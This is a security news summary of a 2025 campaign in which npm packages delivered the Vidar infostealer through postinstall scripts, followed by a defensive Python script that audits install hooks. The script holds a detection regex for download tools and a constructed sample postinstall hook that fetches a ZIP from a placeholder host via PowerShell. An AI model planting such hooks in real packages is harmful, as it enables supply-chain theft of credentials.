Weaponized npm Packages Targeting Windows Systems

Source: Cyber Security News

Between October 21 and 26, 2025, threat actors published 17 malicious npm packages with legitimate-sounding names to trick developers into installing them. The operation targeted Windows systems and delivered the Vidar infostealer through postinstall scripts. Because npm runs these lifecycle scripts automatically during package installation, they could download an encrypted ZIP file from compromised infrastructure without any further user action. The malware collects sensitive information such as browser credentials and cryptocurrency wallets, then resolves its command-and-control servers through hardcoded Telegram accounts. After exfiltrating the data, it deletes itself to evade detection.

Datadog Security Labs uncovered the attack with its GuardDog static analyzer, which flagged several malicious indicators. The deceptive package names and apparent legitimacy allowed the malware to spread widely before the packages were removed from the npm registry. This campaign marks a notable evolution in how Vidar has traditionally spread, moving away from phishing attacks. The packages remained on npm for about two weeks, making this one of the most significant malware campaigns to exploit the npm ecosystem.
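The attack chain above hinges on npm running preinstall/install/postinstall scripts automatically. The following audit script is an added example (not code from the article, Datadog or GuardDog) that walks a node_modules tree, lists every package that declares an install-time hook, and flags hooks that look like they fetch and unpack a remote payload on a Windows host; the sample package.json and the example.invalid URL are constructed for illustration. Setting `ignore-scripts=true` in .npmrc (or passing `--ignore-scripts`) is the blunt mitigation that stops such hooks from running at all.

```python
"""Audit npm packages for install-time lifecycle scripts (added example)."""
import json
import os
import re

# npm runs these automatically during `npm install` unless ignore-scripts is set.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristics for a hook that downloads and unpacks something on a Windows host.
SUSPICIOUS = re.compile(
    r"(powershell|pwsh|cmd\.exe|curl |wget |Invoke-WebRequest|\biwr\b|"
    r"https?://|\.zip\b|Expand-Archive|node -e)",
    re.IGNORECASE,
)


def audit_package_json(text):
    """Return [(hook, command, suspicious)] for every install hook in one package.json."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings.append((hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings


def audit_node_modules(root):
    """Walk node_modules and audit each package.json; returns {relative path: findings}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                hits = audit_package_json(fh.read())
            if hits:
                results[os.path.relpath(dirpath, root)] = hits
    return results


# Constructed samples: one hook that fetches a ZIP, one that merely builds a native addon.
SAMPLE_MALICIOUS = json.dumps({"name": "example-utils", "version": "1.0.0", "scripts": {
    "postinstall": "powershell -c \"Invoke-WebRequest http://example.invalid/p.zip -OutFile p.zip\"",
    "test": "jest"}})
SAMPLE_BENIGN = json.dumps({"name": "native-addon", "version": "2.0.0", "scripts": {
    "install": "node-gyp rebuild"}})

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        for hook, cmd, bad in audit_package_json(sample):
            print(f"{'SUSPICIOUS' if bad else 'review   '} {hook}: {cmd}")
```

Treat every listed hook as something to review, not only the flagged ones; the regex is a triage aid, and a hook that runs `node setup.js` can hide the same download one file away.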

👉 Read the original: Cyber Security News